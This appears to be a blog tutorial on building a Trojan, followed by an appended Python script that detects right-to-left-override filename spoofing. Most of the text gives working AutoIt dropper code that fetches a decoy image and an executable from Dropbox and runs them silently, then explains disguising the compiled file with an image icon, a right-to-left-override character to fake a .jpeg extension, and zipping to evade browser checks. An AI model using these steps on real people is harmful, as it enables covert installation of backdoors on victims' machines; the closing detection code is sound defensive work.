A Trojan horse (or Trojan) is one of the most common and dangerous types of threats that can infect your computer or mobile device.
Trojan malware, when opened, appears to be a legitimate file that the user opened, like an image, a document or a media file, but in the background it runs a malicious process, such as giving someone access to your computer through a backdoor or injecting other harmful code.
In this blog, I will show you how I combined my executable file with an image file so that, when a target person opened it, it displayed the image while the executable ran in the background. In simple words, I hid my .exe file in a .jpg image file.
This method can be extended to any file type like image, pdf, music, and so on. The executable in most cases is a virus or a backdoor used to gain access to the target computer. Let’s look at the steps:
The executable file needs to be present on a publicly available URL from where it is directly downloaded by the browser. I have uploaded the executable on Dropbox for this purpose. In the case of Dropbox, changing the end part of the sharable link to dl=1 makes the browser download the file directly. The link I have shared below does not contain any code and is actually an empty file, so it is safe for you to test the behavior of this link.
URL for the executable:
URL for my image:
I have used the image of the sports complex as a cover.
#include <StaticConstants.au3>
#include <WindowsConstants.au3>
Local $urls = "url1,url2"
Local $urlsArray = StringSplit($urls, ",", 2)   ; split the comma-separated list into an array
For $url In $urlsArray
    $sFile = _DownloadFile($url)   ; fetch each URL into the temp directory
    ShellExecute($sFile)           ; open the downloaded file with its default handler
Next

Func _DownloadFile($sURL)
    Local $hDownload, $sFile
    $sFile = StringRegExpReplace($sURL, "^.*/", "")   ; keep only the part after the last "/"
    $sDirectory = @TempDir & $sFile
    $hDownload = InetGet($sURL, $sDirectory, 17, 1)   ; background download to that path
    InetClose($hDownload)
    Return $sDirectory
EndFunc   ;==>_DownloadFile
In the above code, in line number 3, replace url1 with the URL of the image and url2 with the URL of the executable file. My final code looks like this:
#include <StaticConstants.au3>
#include <WindowsConstants.au3>
Local $urls = "https://images.adsttc.com/media/images/5b04/5e3a/f197/cc1f/9600/00aa/newsletter/park_garden_concourse.jpg,https://www.dropbox.com/s/hsnvw0ik1em0637/some_evil_file.exe?dl=1"
Local $urlsArray = StringSplit($urls, ",", 2)   ; split the comma-separated list into an array
For $url In $urlsArray
    $sFile = _DownloadFile($url)   ; fetch each URL into the temp directory
    ShellExecute($sFile)           ; open the downloaded file with its default handler
Next

Func _DownloadFile($sURL)
    Local $hDownload, $sFile
    $sFile = StringRegExpReplace($sURL, "^.*/", "")   ; keep only the part after the last "/"
    $sDirectory = @TempDir & $sFile
    $hDownload = InetGet($sURL, $sDirectory, 17, 1)   ; background download to that path
    InetClose($hDownload)
    Return $sDirectory
EndFunc   ;==>_DownloadFile
Save the file with the extension .au3. I have named the file trojan.
Since I am using an image as a cover file, and Windows usually shows the thumbnail of an image as its file icon, I will use the sports complex image as the icon and convert it to .ico format. You can google for it and you will find a number of tools to do it. I used this website for it - https://cloudconvert.com/jpg-to-ico
The script is written in a scripting language called AutoIt. To install AutoIt on Ubuntu, you can install wine and then install AutoIt, or, if you want a straightforward way, install Veil following the steps mentioned here: https://www.javatpoint.com/installing-veil. AutoIt is installed in one of those steps, after which you can exit the installation.
Open the Compile AutoIt app. The window should look something like the box shown below. Enter the location of the trojan.au3 file and the path of the .ico file.
The converted file looks like this on a Windows machine.
Well, something's not right. The problem with this file is its extension. It is obvious that it is an executable, since its extension is .exe. We need to spoof this extension.
To spoof the obvious extension .exe and replace it with .jpeg, we will use a right-to-left-override character.
To learn the details of how the spoofing actually works and where to place the right-to-left-override character, read the blog Spoofing File Extensions.
To summarise the steps mentioned in the above blog:
Insert the right-to-left-override character at the 7th position after trojan. All the characters after the right-to-left-override character will be flipped, i.e. read right to left.
The filename now looks like
Since the image contained in the file is of a sports complex, I will replace trojan in the name with sportscompl_ so that the file name reads
Congrats!!! Your trojan is ready.
Now the filename matches the image it contains. Some recent browsers remove the right-to-left-override before downloading, so it is a good idea to zip the file and send it over.
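A defender-side check for the right-to-left-override trick described above, added here as an example that is not part of the original post. It flags filenames, loose or inside a zip archive (since the post recommends zipping), that contain Unicode bidirectional control characters, and reports how the name is displayed versus the extension Windows actually executes. The rendering is an approximation of a bidi-naive display, and the sample archive is constructed inline.

```python
import io
import os
import zipfile

# Unicode bidi overrides/embeddings/isolates; U+202E is the right-to-left override.
BIDI_CONTROLS = {"\u202A", "\u202B", "\u202C", "\u202D", "\u202E",
                 "\u2066", "\u2067", "\u2068", "\u2069"}
# Extensions the shell treats as executable (constructed, non-exhaustive list).
EXECUTABLE_EXTS = {".exe", ".scr", ".com", ".bat", ".cmd", ".ps1", ".js", ".vbs", ".msi"}


def rendered_name(name):
    """Approximate how a display shows the name: text after the first U+202E
    is reversed, and all other bidi control characters are invisible."""
    head, sep, tail = name.partition("\u202E")
    head = "".join(c for c in head if c not in BIDI_CONTROLS)
    tail = "".join(c for c in tail if c not in BIDI_CONTROLS)
    return head + tail[::-1]


def check_filename(name):
    """Return a list of findings for one filename (empty if nothing suspicious)."""
    findings = []
    controls = [f"U+{ord(c):04X}" for c in name if c in BIDI_CONTROLS]
    if controls:
        findings.append("bidi control characters: " + ", ".join(controls))
    real_ext = os.path.splitext(name)[1].lower()      # what Windows actually runs
    if real_ext in EXECUTABLE_EXTS:
        findings.append(f"real extension {real_ext} is executable")
    shown = rendered_name(name)
    shown_ext = os.path.splitext(shown)[1].lower()    # what the user sees
    if controls and shown_ext != real_ext:
        findings.append(f"displays as {shown!r} (looks like {shown_ext}) but is really {real_ext}")
    return findings


def scan_zip(data):
    """Check every entry name in a zip archive given as bytes; returns {name: findings}."""
    results = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            found = check_filename(info.filename)
            if found:
                results[info.filename] = found
    return results


def build_sample_zip():
    """Constructed sample archive: one RTLO-spoofed entry and one benign image entry."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("sportscompl_\u202Egpj.exe", b"placeholder bytes, not a real program")
        zf.writestr("park_garden_concourse.jpg", b"\xff\xd8\xff\xe0 placeholder jpeg header")
    return buf.getvalue()
```

Running `scan_zip(build_sample_zip())` reports only the spoofed entry, showing that it displays as sportscompl_exe.jpg while its real extension is .exe.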